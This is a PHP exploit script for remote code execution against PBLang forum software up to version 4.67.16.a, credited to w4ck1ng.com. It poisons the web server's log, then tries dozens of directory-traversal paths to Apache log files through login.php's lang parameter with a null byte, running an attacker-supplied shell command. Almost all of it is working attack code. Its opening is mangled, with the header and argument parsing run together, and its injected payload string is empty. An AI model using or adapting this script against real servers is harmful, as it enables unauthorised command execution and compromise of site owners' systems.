#!/usr/bin/php -q -d short_open_tag=on "-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];} if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } } $cmd=urlencode($cmd); if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} $code=""; $packet="GET " . $p . $code . " HTTP/1.0\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; $packet.="Host: " . $host . "\r\n"; $packet.="Connection: close\r\n\r\n"; sendpacketii($packet); sleep(3); $paths= array ( "/../../../../../var/log/httpd/access_log", "/../../../../../var/log/httpd/error_log", "/../../../../../../var/log/httpd/access_log", "/../../../../../../var/log/httpd/error_log", "/../../../../../../../var/log/httpd/access_log", "/../../../../../../../var/log/httpd/error_log", "/../../../../../apache/logs/error.log", "/../../../../../apache/logs/access.log", "/../../../../../../apache/logs/error.log", "/../../../../../../apache/logs/access.log", "/../../../../../../../apache/logs/error.log", "/../../../../../../../apache/logs/access.log", "/../../../../../logs/error.log", "/../../../../../logs/access.log", "/../../../../../../logs/error.log", "/../../../../../../logs/access.log", "/../../../../../../../logs/error.log", "/../../../../../../../logs/access.log", "/../../../../../etc/httpd/logs/access_log", "/../../../../../etc/httpd/logs/access.log", "/../../../../../etc/httpd/logs/error_log", "/../../../../../etc/httpd/logs/error.log", "/../../../../../../etc/httpd/logs/access_log", "/../../../../../../etc/httpd/logs/access.log", "/../../../../../../etc/httpd/logs/error_log", "/../../../../../../etc/httpd/logs/error.log", "/../../../../../../../etc/httpd/logs/access_log", "/../../../../../../../etc/httpd/logs/access.log", "/../../../../../../../etc/httpd/logs/error_log", "/../../../../../../../etc/httpd/logs/error.log", "/../../../../../usr/local/apache/logs/access_log", "/../../../../../usr/local/apache/logs/access.log", "/../../../../../../usr/local/apache/logs/access_log", "/../../../../../../usr/local/apache/logs/access.log", "/../../../../../../../usr/local/apache/logs/access_log", "/../../../../../../../usr/local/apache/logs/access.log", "/../../../../../usr/local/apache/logs/error_log", "/../../../../../usr/local/apache/logs/error.log", "/../../../../../../usr/local/apache/logs/error_log", "/../../../../../../usr/local/apache/logs/error.log", "/../../../../../../../usr/local/apache/logs/error_log", "/../../../../../../../usr/local/apache/logs/error.log", "/../../../../../var/log/apache/access_log", "/../../../../../var/log/apache/access.log", "/../../../../../../var/log/apache/access_log", "/../../../../../../var/log/apache/access.log", "/../../../../../../../var/log/apache/access_log", "/../../../../../../../var/log/apache/access.log", "/../../../../../../var/log/apache/error_log", "/../../../../../../var/log/apache/error.log", "/../../../../../../../var/log/apache/error_log", "/../../../../../../../var/log/apache/error.log", "/../../../../../../../../var/log/apache/error_log", "/../../../../../../../../var/log/apache/error.log", "/../../../../../var/log/access_log", "/../../../../../var/log/access.log", "/../../../../../../var/log/access_log", "/../../../../../../var/log/access.log", "/../../../../../../../var/log/access_log", "/../../../../../../../var/log/access.log", "/../../../../../var/log/error_log", "/../../../../../var/log/error.log", "/../../../../../../var/log/error_log", "/../../../../../../var/log/error.log", "/../../../../../../../var/log/error_log", "/../../../../../../../var/log/error.log", "/../../../../../var/www/logs/access_log", "/../../../../../var/www/logs/access.log", "/../../../../../../var/www/logs/access_log", "/../../../../../../var/www/logs/access.log", "/../../../../../../../var/www/logs/access_log", "/../../../../../../../var/www/logs/access.log", "/../../../../../var/www/logs/error_log", "/../../../../../var/www/logs/error.log", "/../../../../../../var/www/logs/error_log", "/../../../../../../var/www/logs/error.log", "/../../../../../../../var/www/logs/error_log", "/../../../../../../../var/www/logs/error.log", ); for ($i=0; $i<=count($paths)-1; $i++) { $a=$i+2; $packet ="GET " . $p . "login.php?lang=" . $paths[$i] . "%00&cmd=" . $cmd . " HTTP/1.1\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; $packet.="Host: " . $host . "\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (strstr($html,"w4ckw4ck")) { $temp=explode("w4ckw4ck",$html); print "-------------------------------------------------------------------------\r\n"; print " PBLang <= 4.67.16.a Remote Code Execution Exploit\r\n"; print "-------------------------------------------------------------------------\r\n"; echo $temp[1]; print "-------------------------------------------------------------------------\r\n"; print " http://www.w4ck1ng.com\r\n"; print " ...Silentz\r\n"; print "-------------------------------------------------------------------------\r\n"; exit; } } print "-------------------------------------------------------------------------\r\n"; print " PBLang <= 4.67.16.a Remote Code Execution Exploit\r\n"; print "-------------------------------------------------------------------------\r\n"; echo "[-] Exploit Failed...\r\n"; print "-------------------------------------------------------------------------\r\n"; print " http://www.w4ck1ng.com\r\n"; print " ...Silentz\r\n"; print "-------------------------------------------------------------------------\r\n"; ?>